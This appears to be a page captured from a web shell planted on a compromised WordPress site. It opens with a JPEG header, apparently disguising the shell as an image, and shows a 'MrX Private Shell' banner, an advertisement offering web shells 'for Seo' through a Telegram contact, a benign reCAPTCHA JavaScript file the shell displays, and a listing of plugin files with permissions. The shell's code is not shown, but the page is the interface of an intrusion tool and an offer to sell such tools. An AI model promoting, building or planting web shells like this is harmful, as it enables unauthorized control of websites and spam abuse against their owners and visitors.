����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
// WooCommerce Registration form
jQuery(document).ready(function(){
show_lz_multi_cap();
});
function captcha_v2_invisible_process(el){
grecaptcha.ready(function() {
var cap_div_id = grecaptcha.render(el,{
'sitekey': lz_cap_sitekey, 'size': 'invisible',
'callback' : function (recaptchaToken) {
jQuery('#g-recaptcha-response').trigger('change');
},
'expired-callback' : function(){grecaptcha.reset(cap_div_id);}
});
grecaptcha.execute(cap_div_id);
});
}
function show_lz_multi_cap(){
if(typeof grecaptcha == 'undefined'){
setTimeout(function(){show_lz_multi_cap()}, 1000);
return;
}
// reCAPTCHA v2 tick box
jQuery('.lz-recaptcha').each(function(index, el) {
// Get the sitekey
var lz_cap_key = jQuery(this).attr('data-sitekey');
//alert(lz_cap_key);
// Render it
try{
grecaptcha.render(el, {'sitekey' : lz_cap_key});
}catch(e){}
});
// reCAPTCHA v2 invisible
if(typeof lz_cap_invisible !== 'undefined' && lz_cap_invisible == 1 && typeof lz_cap_ver !== 'undefined' && lz_cap_ver == 2){
for (var i = 0; i < document.forms.length; ++i) {
var form = document.forms[i];
var cap_div = form.querySelector("."+lz_cap_div_class);
if (null === cap_div) continue;
cap_div.innerHTML = '';
captcha_v2_invisible_process(cap_div);
}
}
// reCAPTCHA v3
if(typeof lz_cap_ver !== 'undefined' && lz_cap_ver == 3){
grecaptcha.ready(function(){
document.querySelectorAll('.lz-v3-input').forEach(function (inputElement){
grecaptcha.execute(lz_cap_sitekey, {action: lz_cap_page_type}).then(function(token){
jQuery(inputElement).val(token).trigger('change');
});
});
});
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin.js | File | 6.59 KB | 0644 |
|
| jquery-clockpicker.min.js | File | 10.89 KB | 0644 |
|
| jquery.qrcode.min.js | File | 20.77 KB | 0644 |
|
| multi-recaptcha.js | File | 1.66 KB | 0644 |
|
| woocommerce.js | File | 5.26 KB | 0644 |
|